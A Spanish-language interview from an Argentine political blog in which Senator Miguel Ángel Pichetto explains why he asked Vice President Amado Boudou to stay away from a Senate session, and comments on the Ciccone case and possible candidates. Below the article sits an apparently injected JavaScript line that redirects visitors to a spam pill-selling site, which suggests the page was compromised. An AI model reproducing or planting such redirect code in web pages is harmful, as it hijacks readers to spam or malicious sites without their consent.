Miguel Ángel Pichetto: «Intervine ante Boudou por una cuestión de Estado»

El jefe de los senadores kirchneristas reconoció su participación en las gestiones para que el vicepresidente no estuviera en la sesión de anteayer; admitió el costo político del caso
SAN CARLOS DE BARILOCHE.- El senador Miguel Ángel Pichetto abandonó la prudencia que mantuvo hasta el momento y dijo que por una «cuestión de Estado» intercedió para que el vicepresidente Amado Boudou no presida la sesión de anteayer en el Senado para allanar el camino a un proyecto crucial para el oficialismo, el que otorga inmunidad.
En diálogo con LA NACION, el senador kirchnerista habló de las motivaciones que lo llevaron a pedir la ausencia del vicepresidente en el recinto ante la advertencia de la oposición de que se retiraría de la sesión o que insistiría en la necesidad de que se tome una licencia en su cargo hasta ver si su procesamiento en la causa Ciccone queda ratificado por sentencia firme.
Pichetto también se refirió a este punto, pero no fue muy enfático en la defensa del vicepresidente. Dijo simplemente que «es una atribución personal» hacerlo.
Como posible candidato el año próximo, el senador reconoció que el caso Boudou «indudablemente» lo afecta como al resto de los postulantes, pero consideró que el tratamiento de la causa en los medios de comunicación es «excesivo».
-¿Por qué intervino ante el vicepresidente Amado Boudou para evitar que presida la sesión del jueves?
-Intervine porque privilegié sacar una ley que la Argentina necesita para el intercambio con bancos centrales de otros países, que es muy importante, especialmente por un acuerdo con la República de China que está próximo a firmarse.
-¿Hubo un acuerdo con el radicalismo?
-Era una cuestión de Estado. Debíamos priorizar la sanción de una ley que era promovida por el gobierno nacional.
-¿Este desplazamiento del vicepresidente es una señal para que tome licencia?
-No tiene nada que ver, y aprovecho para reconocer al vicepresidente su gesto de no bajar al recinto, priorizando el avance del proyecto.
-¿Debe tomar licencia Boudou tras el procesamiento por la causa Ciccone?
-Vuelvo a repetir que el pedido de licencia es una atribución personal del vicepresidente, y los fundamentos de una destitución están contenidos en la Constitución Nacional. Y entre ellos no está un procesamiento ni la obligatoriedad del pedido de licencia. Entendemos que tiene que haber un marco donde la Justicia trabaje con libertad, y el vicepresidente se ha presentado y está a las órdenes del juez. Esperamos que la causa pueda avanzar y clarificarse, pero hay que remarcar que es una instancia de instrucción previa que es el auto de procesamiento, no hay sentencia definitiva.
-La oposición insiste en que debe tomar licencia?
-Es una decisión personal del vicepresidente, y en todo caso, del Poder Ejecutivo, porque éste es un cargo del Poder Ejecutivo.
-¿Esta situación afecta la imagen de los candidatos kirchneristas que compiten por cargos provinciales y nacionales?
-El impacto indudablemente está, pero también es cierto que ha habido un nivel muy riguroso en términos de comunicación, quizás excesivo. No dejo de reconocer la importancia del cargo y del hecho, no lo subestimo, pero nosotros tenemos que cumplir con nuestro compromiso, tratar de llevar adelante la tarea del Senado y hasta este momento ha funcionado perfectamente. Vamos a ver qué pasa a partir de ahora; esto no lo puedo evaluar ahora.
-¿Y si hay un segundo procesamiento por otra causa?
-No quiero hacer ningún tipo de elaboraciones futuras que tendrán que ser analizadas por los propios jueces, no me corresponde a mí.
El senador por estos días también transparentó su cercanía con el gobernador bonaerense, Daniel Scioli, a quien se lo vinculó como potencial compañero de fórmula a comienzos de año. Esto ocurrió luego de que el senador rionegrino pidiera un mayor protagonismo en la mesa chica de discusión del peronismo nacional. «Nadie puede desconocer que tengo más afinidad con Scioli», admitió.
Dijo además que el bonaerense «es un buen candidato, al igual que [Florencio] Randazzo», a quien mencionó como una figura importante dentro del Frente para la Victoria. Y valoró que se proponga un amplio abanico de propuestas en las PASO para que sea la ciudadanía la que elija al candidato del kirchnerismo..

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *